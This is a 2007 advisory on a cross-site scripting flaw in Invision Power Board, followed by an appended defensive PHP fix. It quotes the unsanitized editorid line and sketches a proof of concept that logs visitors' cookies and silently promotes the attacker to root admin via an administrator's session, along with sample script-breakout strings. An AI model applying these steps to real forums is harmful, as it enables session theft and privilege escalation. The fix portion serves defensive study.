Invision Power Board Cross Site Scripting Vulnerability
3 Jun. 2007
Summary
A vulnerability in Invision Power Board allows remote attackers to perform cross-site scripting, which in turn can be used to make the administrator of the forum, or any other privileged user, execute arbitrary commands (SQL commands). The following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by Iron.
The original article can be found at: http://www.ironwarez.info
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so it allows
# other users to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Now, post a message on the forum or send a pm to your target with the link to the html page.
# If a normal user views the page, his cookies
# will be logged, funny. If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).
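
The `var editor_id = ...` line quoted above writes a request parameter straight into a JavaScript string inside a script block. The following is an added example, not code from the original advisory or from Invision Power Board, showing one way to harden that output: allowlist validation followed by encoding for the JavaScript-in-HTML context. The identifier format, the fallback value `DEFAULT_EDITOR_ID`, and the function names `safe_editor_id` and `js_string_literal` are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the unsanitized editor_id output.
// Assumption: a legitimate editor id is a short identifier (letters, digits,
// "_" and "-"); the advisory does not document the real format.

const DEFAULT_EDITOR_ID = 'ed-0'; // hypothetical fallback value

function safe_editor_id($raw)
{
    // Allowlist validation: reject anything that is not a plain identifier.
    if (!is_string($raw) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw)) {
        return DEFAULT_EDITOR_ID;
    }
    return $raw;
}

function js_string_literal($value)
{
    // Context-aware encoding for a JavaScript string inside an HTML <script>
    // block: the JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes,
    // so the value can neither end the string nor close the script element.
    return json_encode(
        (string) $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

// Constructed sample inputs: one legitimate id and two values that would
// break out of the string in the original, unsanitized line.
$samples = array(
    'ed-0',
    '";alert(1);//',
    '</script><script>alert(1)</script>',
);

foreach ($samples as $raw) {
    // Defence in depth: validate first, then encode for the output context.
    echo 'var editor_id = ' . js_string_literal(safe_editor_id($raw)) . ";\n";
    // Encoding alone already keeps the raw value inside the string literal.
    echo '// encoded only: ' . js_string_literal($raw) . "\n";
}
```

Because the PoC described above relies on an administrator's existing session, marking session cookies `HttpOnly` and requiring a per-request anti-CSRF token on admin actions limits the impact of any script injection that remains.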